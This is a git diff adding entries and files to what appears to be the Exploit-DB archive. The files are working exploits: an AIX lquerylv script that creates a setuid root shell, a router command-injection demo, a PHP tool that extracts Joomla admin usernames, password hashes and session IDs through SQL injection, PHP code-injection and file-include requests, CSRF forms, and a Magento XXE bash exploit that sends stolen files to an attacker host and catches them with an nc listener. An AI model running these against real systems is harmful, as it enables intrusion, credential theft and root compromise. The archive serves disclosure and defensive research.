diff --git a/files.csv b/files.csv index 462096930..7630f851b 100755 --- a/files.csv +++ b/files.csv @@ -33625,6 +33625,7 @@ id,file,description,date,author,platform,type,port 37241,platforms/hardware/webapps/37241.txt,"D-Link DSL-526B ADSL2+ AU_2.01 - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0 37243,platforms/php/webapps/37243.txt,"Wordpress Wp-ImageZoom 1.1.0 - Multiple Vulnerabilities",2015-06-08,T3N38R15,php,webapps,80 37244,platforms/php/webapps/37244.txt,"Wordpress Plugin 'WP Mobile Edition' - LFI Vulnerability",2015-06-08,"Ali Khalil",php,webapps,0 +37245,platforms/php/webapps/37245.txt,"Pasworld detail.php - Blind Sql Injection Vulnerability",2015-06-08,"Sebastian khan",php,webapps,0 37266,platforms/php/webapps/37266.txt,"ClickHeat <= 1.14 Change Admin Password CSRF",2015-06-12,"David Shanahan",php,webapps,80 37249,platforms/linux/dos/37249.py,"Libmimedir VCF Memory Corruption PoC",2015-06-10,"Jeremy Brown",linux,dos,0 37250,platforms/xml/webapps/37250.txt,"HP WebInspect <= 10.4 XML External Entity Injection",2015-06-10,"Jakub Palaczynski",xml,webapps,0 @@ -34809,13 +34810,15 @@ id,file,description,date,author,platform,type,port 38526,platforms/windows/remote/38526.py,"Easy File Sharing Web Server 7.2 - Remote SEH Based Overflow",2015-10-23,Audit0r,windows,remote,0 38527,platforms/php/webapps/38527.txt,"Realtyna RPL Joomla Extension 8.9.2 - Multiple SQL Injection Vulnerabilities",2015-10-23,"Bikramaditya Guha",php,webapps,0 38528,platforms/php/webapps/38528.txt,"Realtyna RPL Joomla Extension 8.9.2 - Persistent XSS And CSRF Vulnerabilities",2015-10-23,"Bikramaditya Guha",php,webapps,0 +38572,platforms/php/webapps/38572.txt,"PHP Server Monitor 3.1.1- Multiple CSRF Vulnerabilities",2015-10-30,hyp3rlinx,php,webapps,0 38532,platforms/windows/local/38532.py,"Alreader 2.5 .fb2 - SEH Based Stack Overflow (ASLR and DEP bypass)",2015-10-25,g00dv1n,windows,local,0 38533,platforms/windows/local/38533.c,"Windows 10 - pcap Driver Local Privilege Escalation",2015-10-26,Rootkitsmm,windows,local,0 +38534,platforms/php/webapps/38534.php,"Joomla 3.2.x - 3.4.4 - SQL Injection",2015-10-26,"Manish Tanwar",php,webapps,0 38535,platforms/osx/remote/38535.rb,"Safari User-Assisted Applescript Exec Attack",2015-10-26,metasploit,osx,remote,0 38538,platforms/multiple/dos/38538.py,"Code::Blocks Denial of Service Vulnerability",2013-05-29,ariarat,multiple,dos,0 38540,platforms/osx/local/38540.rb,"Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation",2015-10-27,metasploit,osx,local,0 38541,platforms/php/remote/38541.rb,"Th3 MMA mma.php Backdoor Arbitrary File Upload",2015-10-27,metasploit,php,remote,80 -38542,platforms/windows/dos/38542.cpp,"Win10Pcap - Local Privilege Escalation Vulnerability",2015-10-27,R00tkitSMM,windows,dos,0 +38542,platforms/windows/local/38542.cpp,"Win10Pcap - Local Privilege Escalation Vulnerability",2015-10-27,R00tkitSMM,windows,local,0 38543,platforms/php/webapps/38543.txt,"php4dvd 'config.php' PHP Code Injection Vulnerability",2012-05-31,"CWH Underground",php,webapps,0 38544,platforms/php/webapps/38544.txt,"Elastix Multiple Cross Site Scripting Vulnerabilities",2013-05-28,cheki,php,webapps,0 38545,platforms/php/webapps/38545.txt,"Telaen 2.7.x Cross Site Scripting Vulnerability",2013-06-04,"Manuel García Cárdenas",php,webapps,0 @@ -34839,3 +34842,16 @@ id,file,description,date,author,platform,type,port 38564,platforms/windows/dos/38564.py,"Sam Spade 1.14 - Scan From IP Address Field SEH Overflow Crash PoC",2015-10-29,"Luis Martínez",windows,dos,0 38565,platforms/php/webapps/38565.txt,"Joomla JNews (com_jnews) Component 8.5.1 - SQL Injection",2015-10-29,"Omer Ramić",php,webapps,80 38566,platforms/hardware/dos/38566.py,"NetUSB Kernel Stack Buffer Overflow",2015-10-29,"Adrián Ruiz Bermudo",hardware,dos,0 +38567,platforms/php/webapps/38567.txt,"Max Forum Multiple Security Vulnerabilities",2013-06-09,"CWH Underground",php,webapps,0 +38568,platforms/php/webapps/38568.txt,"WordPress Ambience Theme 'src' Parameter Cross Site Scripting Vulnerability",2013-06-09,Darksnipper,php,webapps,0 +38569,platforms/php/webapps/38569.txt,"Lokboard 'index_4.php' PHP Code Injection Vulnerability",2013-06-10,"CWH Underground",php,webapps,0 +38570,platforms/php/webapps/38570.txt,"ScriptCase 'scelta_categoria.php' SQL Injection Vulnerability",2013-06-10,"Hossein Hezami",php,webapps,0 +38571,platforms/php/webapps/38571.txt,"mkCMS 'index.php' Arbitrary PHP Code Execution Vulnerability",2013-06-11,"CWH Underground",php,webapps,0 +38573,platforms/php/webapps/38573.txt,"eBay Magento <= 1.9.2.1 - PHP FPM XML eXternal Entity Injection",2015-10-30,"Dawid Golunski",php,webapps,0 +38574,platforms/php/webapps/38574.html,"PHP Server Monitor 3.1.1- CSRF Privilege Escalation",2015-10-30,hyp3rlinx,php,webapps,0 +38575,platforms/hardware/webapps/38575.txt,"Hitron Router CGN3ACSMR 4.5.8.16 - Arbitrary Code Execution",2015-10-30,"Dolev Farhi",hardware,webapps,0 +38576,platforms/aix/local/38576.sh,"AIX 7.1 - lquerylv Local Privilege Escalation",2015-10-30,"S2 Crew",aix,local,0 +38577,platforms/php/webapps/38577.txt,"Pligg CMS 2.0.2 - Multiple SQL Injection Vulnerabilities",2015-10-30,"Curesec Research Team",php,webapps,0 +38578,platforms/php/webapps/38578.txt,"Pligg CMS 2.0.2 - Directory Traversal",2015-10-30,"Curesec Research Team",php,webapps,0 +38579,platforms/php/webapps/38579.txt,"Pligg CMS 2.0.2 - CSRF Code Execution",2015-10-30,"Curesec Research Team",php,webapps,0 +38581,platforms/php/webapps/38581.txt,"Oxwall 1.7.4 - CSRF Vulnerability",2015-10-30,"High-Tech Bridge SA",php,webapps,0 diff --git a/platforms/aix/local/38576.sh b/platforms/aix/local/38576.sh new file mode 100755 index 000000000..92bacc1e8 --- /dev/null +++ b/platforms/aix/local/38576.sh @@ -0,0 +1,28 @@ +#!/bin/sh +# +# Exploit Title: AIX 7.1 lquerylv privilege escalation +# Date: 2015.10.30 +# Exploit Author: S2 Crew [Hungary] +# Vendor Homepage: www.ibm.com +# Software Link: - +# Version: - +# Tested on: AIX 7.1 (7100-02-03-1334) +# CVE : CVE-2014-8904 +# +# From file writing to command execution ;) +# +export _DBGCMD_LQUERYLV=1 +umask 0 +ln -s /etc/suid_profile /tmp/DEBUGCMD +/usr/sbin/lquerylv + +cat << EOF >/etc/suid_profile +cp /bin/ksh /tmp/r00tshell +/usr/bin/syscall setreuid 0 0 +chown root:system /tmp/r00tshell +chmod 6755 /tmp/r00tshell +EOF + +/opt/IBMinvscout/bin/invscoutClient_VPD_Survey # suid_profile because uid!=euid +/tmp/r00tshell + diff --git a/platforms/hardware/webapps/38575.txt b/platforms/hardware/webapps/38575.txt new file mode 100755 index 000000000..fe770c953 --- /dev/null +++ b/platforms/hardware/webapps/38575.txt @@ -0,0 +1,45 @@ +# Exploit title: Hitron Router (CGN3ACSMR) - Remote Code Execution +# Author: Dolev Farhi (dolevf at protonmail.ch) +# Date: 29-10-2015 +# Vendor homepage: http://www.hitrontech.com/en/index.php +# Software version: 4.5.8.16 +# Hardware version: 1A + +# Details: +Hitron routers provide an interface to test connectivity (ping, tracert) via the graphical user interface of the router (Management UI). +This interface is vulnerable to code injection using the && argument after the IP address. + +# Steps to reproduce: +1. Navigate to the dashboard +2. Navigate to the admin tab +3. Type an ip address in the Destination form +4. append any code you want after the ip. + +Example one: +8.8.8.8 && cat /etc/passwd + +Result + +root:$1$27272727:0:0::/:/bin/false +nobody:$1$27272727:65535:65535::/:/bin/false +rogcesadmin:filtered/:100:100::/:/usr/sbin/cli +=============Complete============== + + + +Example two: +8.8.8.8 && ip a +PID USER VSZ STAT COMMAND +1 root 1268 S init +2 root 0 SW [kthreadd] +3 root 0 SW [ksoftirqd/0] +5 root 0 SW [kworker/u:0] +6 root 0 SW< [khelper] +7 root 0 SW [irq/74-hw_mutex] +8 root 0 SW [sync_supers] +9 root 0 SW [bdi-default] +10 root 0 SW< [kblockd] +11 root 0 SW< [gPunitWorkqueue] +12 root 0 SW [irq/79-punit_in] +13 root 0 SW [kswapd0] +14 root 0 SW< [crypto] diff --git a/platforms/php/webapps/38534.php b/platforms/php/webapps/38534.php new file mode 100755 index 000000000..65d7e7749 --- /dev/null +++ b/platforms/php/webapps/38534.php @@ -0,0 +1,231 @@ + + + + +--==[[Mannu joomla SQL Injection exploiter by Team Indishell]]==-- + + + + +'; + + + + echo $head ; + echo ' + + + + + +
+ --==[[ Mannu, Joomla SQL Injection exploiter By Team INDIShEll]]==--
+ +
+ + ####################################################################################################################################
+ -==[[Greetz to]]==--
Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indisHell,Baba ,Silent poison India,Magnum sniper,ethicalnoob IndisHell,Local root indisHell,Irfninja indisHell
Reborn India,L0rd Crus4d3r,cool toad,Hackuin,Alicks,Dinelson Amine,Th3 D3str0yer,SKSking,rad paul,Godzila,mike waals,zoo zoo,cyber warrior,Neo hacker ICA
cyber gladiator,7he Cre4t0r,Cyber Ace, Golden boy INDIA,Ketan Singh,Yash,Aneesh Dogra,AR AR,saad abbasi,hero,Minhal Mehdi ,Raj bhai ji , Hacking queen ,lovetherisk and rest of TEAM INDISHELL
+--==[[Love to]]==--
# My Father , my Ex Teacher,cold fire HaCker,Mannu, ViKi,Suriya Cyber Tyson ,Ashu bhai ji,Soldier Of God,almas malik, Bhuppi,Mohit, Ffe ^_^,Ashish,Shardhanand,Govind singh,Budhaoo,Don(Deepika kaushik) and acche bacchi(Jagriti)
+--==[[Interface Desgined By]]==--
GCE College ke DON :D
+ + + #################################################################################################################################### + +
+
+ +'; +?> +
+
+ + + +", $data); +$ar1=explode("", $ar0[1]); +$ar=trim($ar1[0]); +echo "
"; +$v=explode(".",$ar); + + +if($v[0]<=3) +{ + //echo "

Joomla version is 3.*.*"; + + + //echo "
yes yes >:D<, fas gaya billu "; + echo "
click below button to exploit it :v

" ; + echo ""; + echo ""; + + +} +else{ + + echo "joomla version is below 3"; +} + +} + +if(isset($_POST['sm1'])) +{ + +$tar=$_POST['tar']."/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select+1+from+(select+count(*),+concat((select+(select+concat(password))+from+icalab_users+LIMIT+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)"; + +$dat=data($tar); +$ar0=explode("LEFT JOIN", $dat); +$ar1=explode("_users", $ar0[1]); +$ar=trim($ar1[0]); + +$rt=str_replace("icalab",$ar,$tar); +$tr=data($rt); +$ar0=explode("Duplicate entry", $tr); +$ar1=explode("for key", $ar0[1]); + + + $rt2=str_replace("password","username,0x7e",$rt); +$tr2=data($rt2); +$ar2=explode("Duplicate entry", $tr2); +$ar3=explode("for key", $ar2[1]); + +if($ar3[0]!='' && $ar1[0]!='') +{ +echo "

Target gone 8-)

website name:- ".$_POST['tar']."
-------------------------------

"; +echo "username is --> ".str_replace("~1","",trim($ar3[0]))."
Password Hash is --> ".str_replace("~1","",trim($ar1[0])); +echo "
Admin session ID is
"; +$sessionid=$_POST['tar']."/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select+1+from+(select+count(*),+concat((select+(select+concat(session_id))+from+".$ar."_session+where+username='admin'+LIMIT+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)"; + +$ses=data($sessionid); +$ar0=explode("Duplicate entry", $ses); +$ar1=explode("for key", $ar0[1]); +echo trim($ar1[0]); +} +} + +?> + \ No newline at end of file diff --git a/platforms/php/webapps/38567.txt b/platforms/php/webapps/38567.txt new file mode 100755 index 000000000..9d9ee897a --- /dev/null +++ b/platforms/php/webapps/38567.txt @@ -0,0 +1,44 @@ +source: http://www.securityfocus.com/bid/60455/info + +Max Forum is prone to multiple input-validation vulnerabilities including a PHP code-execution vulnerability, a local file-include vulnerability and an information-disclosure because it fails to properly sanitize user-supplied input. + +An attacker can exploit these issues to inject arbitrary PHP code and include and execute arbitrary files from the vulnerable system in the context of the affected application and to obtain sensitive information that may aid in further attacks. + +Max Forum 2.0.0 is vulnerable; other versions may also be affected. + +PHP code-execution: + +POST /Max/install/install.php?step=4 HTTP/1.1 +Host: www.example +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://www.example/Max/install/install.php?step=3 +Cookie: exp_lang=en; language=english; max_name=admin; max_password=2d6df19ab196f1c344310e0021239a06; lang=en_US; PHPSESSID=ver2j0fvv4tb98e3cupdulrd97 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 179 +mysql_host=www.example&mysql_login=root&mysql_pass=toor&mysql_database=max&db_prefix=max_%22%3Bphpinfo%28%29%3B%2F%2F&site_address=http%3A%2F%2Fwww.example%2FMax%2F&step=4&prev_step=3 + +Local file-include: + +GET /Max/install/ HTTP/1.1 +Host: www.example +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: language=../../phpinfo; lang=en_US; PHPSESSID=ver2j0fvv4tb98e3cupdulrd97 +Connection: keep-alive + +Information-disclosure: + +GET /Max/index.php?forum=2 HTTP/1.1 +Host: www.example +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: max_name=admin; max_password=dfbb72b7a33b97abda905a4af7e6c7f5; PHPSESSID=ver2j0fvv4tb98e3cupdulrd97; lang= +Connection: keep-alive diff --git a/platforms/php/webapps/38568.txt b/platforms/php/webapps/38568.txt new file mode 100755 index 000000000..553732153 --- /dev/null +++ b/platforms/php/webapps/38568.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/60458/info + +The Ambience theme for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +http://www.example.com/wp-content/themes/ambience/thumb.php?src=.jpg \ No newline at end of file diff --git a/platforms/php/webapps/38569.txt b/platforms/php/webapps/38569.txt new file mode 100755 index 000000000..a685781f4 --- /dev/null +++ b/platforms/php/webapps/38569.txt @@ -0,0 +1,20 @@ +source: http://www.securityfocus.com/bid/60459/info + +Lokboard is prone to a remote PHP code-injection vulnerability. + +An attacker can exploit this issue to inject and execute arbitrary PHP code in the context of the affected application. This may facilitate a compromise of the application and the underlying system; other attacks are also possible. + +Lokboard 1.1 is vulnerable; other versions may also be affected. + +POST /lokboard/install/index_4.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost/lokboard/install/index_3.php?error=1 +Cookie: lang=; PHPSESSID=g4j89f6110r4hpl3bkecfpc7c1 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 90 +host=localhost&user=root&pass=toor&name=lokboard&pass_key=1234";phpinfo();// \ No newline at end of file diff --git a/platforms/php/webapps/38570.txt b/platforms/php/webapps/38570.txt new file mode 100755 index 000000000..4ebf482b5 --- /dev/null +++ b/platforms/php/webapps/38570.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/60461/info + +ScriptCase is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/scelta_categoria.php?categoria=[SQLi] \ No newline at end of file diff --git a/platforms/php/webapps/38571.txt b/platforms/php/webapps/38571.txt new file mode 100755 index 000000000..c301dfe06 --- /dev/null +++ b/platforms/php/webapps/38571.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/60488/info + +mkCMS is prone to an arbitrary PHP code-execution vulnerability. + +An attacker can exploit this issue to execute arbitrary PHP code within the context of the affected application. + +mkCMS 3.6 is vulnerable; other versions may also be affected. + +http://www.example.com/mkCMS/index.php?cmd=dir \ No newline at end of file diff --git a/platforms/php/webapps/38572.txt b/platforms/php/webapps/38572.txt new file mode 100755 index 000000000..5e2f02f7f --- /dev/null +++ b/platforms/php/webapps/38572.txt @@ -0,0 +1,167 @@ +[+] Credits: hyp3rlinx + +[+] Website: hyp3rlinx.altervista.org + +[+] Source: +http://hyp3rlinx.altervista.org/advisories/AS-PHPSRVMONITOR-CSRF.txt + + +Vendor: +================================ +www.phpservermonitor.org +sourceforge.net/projects/phpservermon/files/phpservermon/PHP%20Server%20Monitor%20v3.1.1/phpservermon-3.1.1.zip/download + + +Product: +================================ +PHP Server Monitor 3.1.1 + + +Vulnerability Type: +================================= +Cross site request forgery (CSRF) + + +Vulnerability Details: +===================== + +Multiple CSRF issues in PHP Server Monitor allow remote attackers to add +arbitrary users & servers to the system, modify system configurations +and delete arbitrary servers, if user (admin) is logged in and visits our +malicious website or clicks on our infected linxs. As no CRSF protection is +used in the application, we can make request on the victims behalf an the +server will happily oblige processing our malicous HTTP requests. + + +Exploit code(s): +=============== + + + + + + + +1) add arbitrary users to the system: + + + + + + + + + + + + + + + +2) add arbitrary servers to the system: + +
+ + + + + + + + + + + +
+ + +3) modify system configuration: + +
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + +4) arbitrary server deletion via GET request: + +http://localhost/sectest/phpservermon-3.1.1/?&mod=server&action=delete&id=2 + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +========================================================= +High + + +Disclosure Timeline: +========================================================= +Vendor Notification: NA +Oct 30, 2015 : Public Disclosure + + +Description: +========================================================== + + +Request Method(s): [+] GET / POST + + +Vulnerable Product: [+] PHP Server Monitor 3.1.1 + + + +=========================================================== + +[+] Disclaimer +Permission is hereby granted for the redistribution of this advisory, +provided that it is not altered except by reformatting it, and that due +credit is given. Permission is explicitly given for insertion in +vulnerability databases and similar, provided that due credit is given to +the author. +The author is not responsible for any misuse of the information contained +herein and prohibits any malicious use of all security related information +or exploits by the author or elsewhere. + +by hyp3rlinx diff --git a/platforms/php/webapps/38573.txt b/platforms/php/webapps/38573.txt new file mode 100755 index 000000000..da7651b58 --- /dev/null +++ b/platforms/php/webapps/38573.txt @@ -0,0 +1,422 @@ +============================================= +- Release date: 29.10.2015 +- Discovered by: Dawid Golunski +- Severity: High/Critical +- eBay Magento ref.: APPSEC-1045 +============================================= + + +I. VULNERABILITY +------------------------- + +eBay Magento CE <= 1.9.2.1 XML eXternal Entity Injection (XXE) on PHP FPM +eBay Magento EE <= 1.14.2.1 + + +II. BACKGROUND +------------------------- + +- eBay Magento eCommerce + +http://magento.com/ + +"More than 240,000 merchants worldwide put their trust in our eCommerce +software. Magento's eCommerce platform gives you the tools you need to attract +more prospects, sell more products, and make more money. It's what we do. + +We're owned by eBay, so you know we're eCommerce experts" + + +- PHP FPM + +http://php.net/manual/en/install.fpm.php + +"FPM (FastCGI Process Manager) is an alternative PHP FastCGI implementation with + some additional features (mostly) useful for heavy-loaded sites." + +Starting from release 5.3.3 in early 2010, PHP merged the php-fpm fastCGI +process manager into its codebase. + + +III. INTRODUCTION +------------------------- + +eBay Magento eCommerce application uses Zend Framework which has a +vulnerability that allows for XML eXternal Entity injection in applications +served with PHP FPM. + +XXE (XML eXternal Entity) attack is an attack on an application that parses XML +input from untrusted sources using incorrectly configured XML parser. +The application may be forced to open arbitrary files and/or network resources. +Exploiting XXE issues on PHP applications may also lead to denial of service or +in some cases (e.g. when an 'expect' PHP module is installed) lead to command +execution. + + +IV. DESCRIPTION +------------------------- + +The aforementioned XXE vulnerability in Zend Framework which affects eBay +Magento, was discovered by Dawid Golunski and can be found in a separate +advisory at: + +http://legalhackers.com/advisories/zend-framework-XXE-vuln.txt + +In short, the Zend Framework XXE vulnerability stems from an insufficient +sanitisation of untrusted XML data on systems that use PHP-FPM to serve PHP +applications. +By using certain multibyte encodings within XML, it is possible to bypass +the sanitisation and perform certain XXE attacks. + +Since eBay Magento is based on Zend Framework and uses several of its XML +classes, it also inherits this XXE vulnerability. + +The vulnerability in Zend affects all its XML components, however there +are two vulnerable Zend Framework vulnerable components: + + - Zend_XmlRpc_Server + - Zend_SOAP_Server + +that are of special interest to attackers as they could be exploited remotely +without any authentication. + +Magento implements a store API providing XML/SOAP web services. +Although the Zend_XmlRpc is present within Magento code base, the testing +revealed that an older zend class was use for its implementation, which was +not vulnerable. + +However, further testing revealed that Magento SOAP API was implemented using +the Zend_SOAP_Server class from Zend Framework, which is vulnerable to the +XXE injection vulnerability discovered earlier. + + +V. PROOF OF CONCEPT +------------------------- + +Normally, when an XML containing entities is supplied to magento SOAP API, the +following message gets produced: + +Sender +Detected use of ENTITY in XML, disabled to prevent XXE/XEE +attacks + +Below is a POC exploit that automates the steps necessary to bypass this +protection on Magento served with PHP-FPM, and remotely exploit the XXE issue +in Magento's SOAP API. + + +---[ magento-soap-exploit.sh ]--- + +#!/bin/bash +# +# POC Exploit +# eBay Magento - XML eXternal Entity Injection (XXE) via SOAP API +# <= 1.9.2.1 +# +# Credits: +# +# Dawid Golunski +# dawid (at) legalhackers.com +# http://legalhackers.com +# +# Usage: +# +# [Vulnerability test] +# +# This is to test the vulnerability with a simple XXE payload which retrieves the +# /dev/random file and causes a time out. No receiver server is required in this +# test as no data is returned. +# +# Run the script with just the URL to Magento SOAP API, with no other parameters. +# E.g: +# ./magento-soap-exploit.sh http://apache-phpfpm/magento/index.php/api/soap/index +# +# +# [File retrieval from the remote server] +# +# ./magento-soap-exploit.sh MAGENTO_SOAP_API_URL FILE_PATH RECEIVER_HOST RECEIVER_PORT +# +# E.g: +# ./magento-soap-exploit.sh http://apache-phpfpm/magento/index.php/api/soap/index /etc/hosts 192.168.10.5 80 +# +# In this example, file extracted via the XXE attack will be sent as base64 encoded parameter to: +# http://192.168.10.5:80/fetch.php?D=[base64_string] +# You should have the receiver server/script listening on the specified port before running this exploit. +# + +TIMEOUT=6 +PAYLOAD_TMP_FILE="/tmp/payload-utf16.xml" + +if [ $# -ne 1 ] && [ $# -ne 4 ] ; then + echo -e "\nUsage: \n" + echo -e "[Vulnerability test]\n" + echo -e "$0 MAGENTO_SOAP_API_URL" + echo -e "E.g:" + echo -e "$0 http://fpmserver/magento/index.php/api/soap/index\n"; + echo -e "[File retrieval]\n" + echo -e "$0 MAGENTO_SOAP_API_URL FILE_PATH RECEIVER_HOST RECEIVER_PORT" + echo -e "E.g:" + echo -e "$0 http://fpmserver/magento/index.php/api/soap/index /etc/hosts 192.168.5.6 80\n"; + exit 2; +else + TARGETURL="$1" +fi +if [ $# -eq 4 ]; then + FILE="$2" + RECEIVER_HOST="$3" + RECEIVER_PORT="$4" + TEST_ONLY=0 +else + TEST_ONLY=1 +fi + +# Perform only a test by reading /dev/random file +if [ $TEST_ONLY -eq 1 ]; then + + # Vulnerability test mode XXE payload + TEST_PAYLOAD_XML=' + + ]> + + + + user + key&xxe; + ' + + echo "$TEST_PAYLOAD_XML" | iconv -f UTF-8 -t UTF-16 > $PAYLOAD_TMP_FILE + echo -e "Target URL: $TARGETURL\nInjecting Test XXE payload (/dev/random). Might take a few seconds.\n" + + # Fetching /dev/random should cause the remote script to block + # on reading /dev/random until the script times out. + # If there is no delay it means the remote script is not vulnerable or + # /dev/random is not accessible. + START=$(date +%s) + wget -t 1 -T $TIMEOUT -O /dev/stdout $TARGETURL --post-file=$PAYLOAD_TMP_FILE + END=$(date +%s) + DIFF=$(expr $END \- $START ) + + if [ $DIFF -eq $TIMEOUT ]; then + echo "Vulnerable. No response from Magento for $DIFF seconds :)" + exit 0 + else + echo "Not vulnerable, or there is no /dev/random on the remote server." + exit 1 + fi + +fi + +# File retrieval XXE payload +SEND_DTD=" +\"> +%all;" +SEND_DTD_B64="`echo "$SEND_DTD" | base64 -w0`" +FILE_PAYLOAD_XML=" + + +%dtd; +]> + + + +user +key&send; +" + +# Retrieve $FILE from the remote server and send it to $RECEIVER_HOST:$RECEIVER_PORT +echo "$FILE_PAYLOAD_XML" | iconv -f UTF-8 -t UTF-16 > $PAYLOAD_TMP_FILE +echo -e "Target URL: $TARGETURL\nInjecting XXE payload to retrieve the $FILE file... \n" +echo -e "If successful, Base64 encoded result will be sent to http://$RECEIVER_HOST:$RECEIVER_PORT/fetch.php/D=[base64_result]" +echo -e "If in doubt, try the vulnerability test option." +wget -t 1 -v -T $TIMEOUT -O /dev/stdout $TARGETURL --post-file=$PAYLOAD_TMP_FILE + +-------------------------------- + +The above exploit uses the Out of band XXE payload which sends +any retrieved data back to the attacker even though the attacker cannot +see the resulting file in the server's response directly. +This exploit also bypasses the LIBXML_NONET libxml setting imposed by the Zend +Frameork which prohibits network access. This is achieved through the usage of +php://filter wrapper which is treated as a local resource by the XML ENTITY +handler even though it references remote resources. + +Successful exploitation in a test mode ('Vulnerability test', exploit run +without parameters other than the URL to Magento SOAP API) will result in a +time out and an internal server error caused by the XML ENTITY accessing +/dev/random file which will block the API script. + +For example: + +--- + +$ ./magento-soap-exploit.sh http://vulnhost/magento/index.php/api/soap/index +Target URL: http://vulnhost/magento/index.php/api/soap/index +Injecting Test XXE payload (/dev/random). Might take a few seconds. + +--2015-05-19 22:14:17-- http://vulnhost/magento/index.php/api/soap/index +Resolving precise (vulnhost)... 127.0.0.1 +Connecting to vulnhost (vulnhost)|127.0.0.1|:80... connected. +HTTP request sent, awaiting response... Read error (Connection timed out) in +headers. Giving up. + +Vulnerable. No response from Magento for 6 seconds :) + +--- + + +Arbitrary file accessible to the PHP process can also be fetched with the +above exploit by using the following syntax: + +--- + +attacker$ ./magento-soap-exploit.sh http://vulnhost/magento/index.php/api/soap/index /etc/passwd attackershost 9090 + +Target URL: http://vulnhost/magento/index.php/api/soap/index +Injecting XXE payload to retrieve the /etc/passwd file... + +If successful, Base64 encoded result will be sent to http://attackershost:9090/fetch.php/D=[base64_result] +If in doubt, try the vulnerability test option. + +--2015-05-19 22:33:06-- http://vulnhost/magento/index.php/api/soap/index +Resolving vulnhost (vulnhost)... 192.168.57.12 +Connecting to vulnhost (vulnhost)|192.168.57.12|:80... connected. +HTTP request sent, awaiting response... Read error (Connection timed out) in +headers. Giving up. + +--- + +The result will be sent to attacker's server listening on port 9090 which +needs to be set up before running the exploit: + +--- + +attacker# nc -vv -l 9090 + +Listening on [0.0.0.0] (family 0, port 9090) +Connection from [192.168.57.12] port 9090 [tcp/*] accepted (family 2, sport 47227) +GET /fetch.php?D=cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovYmluL3NoCmJpbjp4OjI6MjpiaW46L2JpbjovYmluL3NoCnN5czp4OjM6MzpzeXM6L2RldjovYmluL3NoCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovY[...cut...] HTTP/1.0 +Host: attackershost:9090 + + +attacker# echo 'cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovYmluL3NoCmJpbjp4OjI6MjpiaW46L2JpbjovYmluL3NoCnN5czp4OjM6MzpzeXM6L2RldjovYmluL3NoCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovY' | base64 -d + +root:x:0:0:root:/root:/bin/bash +daemon:x:1:1:daemon:/usr/sbin:/bin/sh +bin:x:2:2:bin:/bin:/bin/sh +sys:x:3:3:sys:/dev:/bin/sh +[...] + +--- + + +It may also be possible to execute arbitrary commands on the remote server +if the remote PHP installation has the 'expect' module enabled. +In such case, an attacker could use expect:// wrapper within XML ENTITY +to execute any command in the context of the PHP process. +E.g: + + + + +VI. BUSINESS IMPACT +------------------------- + +This issue should be marked as high/critical due to the wide deployment of +eBay Magento software, low complexity of exploitation, as well as a possibility +of an unauthenticated remote exploitation as demonstrated in this advisory. +Authentication in case of SOAP is not required for exploitation +as the XML needs to be processed first in order to read credentials passed +within the XML, in a SOAP login method. + +There is also a growing number of servers set up to serve PHP code with +PHP-FPM, especially in web hosting environments which need to respond to heavy +load. +There are official Magento tutorials explaining how to set up Magento with Nginx +and PHP FPM for best performance: + +http://info.magento.com/rs/magentocommerce/images/ +MagentoECG-PoweringMagentowithNgnixandPHP-FPM.pdf + +VII. SYSTEMS AFFECTED +------------------------- + +The versions of eBay Magento CE before 1.9.2.1 were confirmed to be exploitable +on an Apache web server with PHP-FPM SAPI, and a libxml library which processes +XML entities by default. + +eBay Magento EE was not tested, but is also affected by this issue according +to the vendor. The fix for this issue is in Magento EE 1.14.2.2 according to +the APPSEC-1045 advisory. + +PHP-FPM can be set up on popular web servers such as Apache, or Nginx +on Linux/Unix, as well as Windows systems (as per the 'fpm on cygwin' setup +guides available on the Internet). + + +VIII. 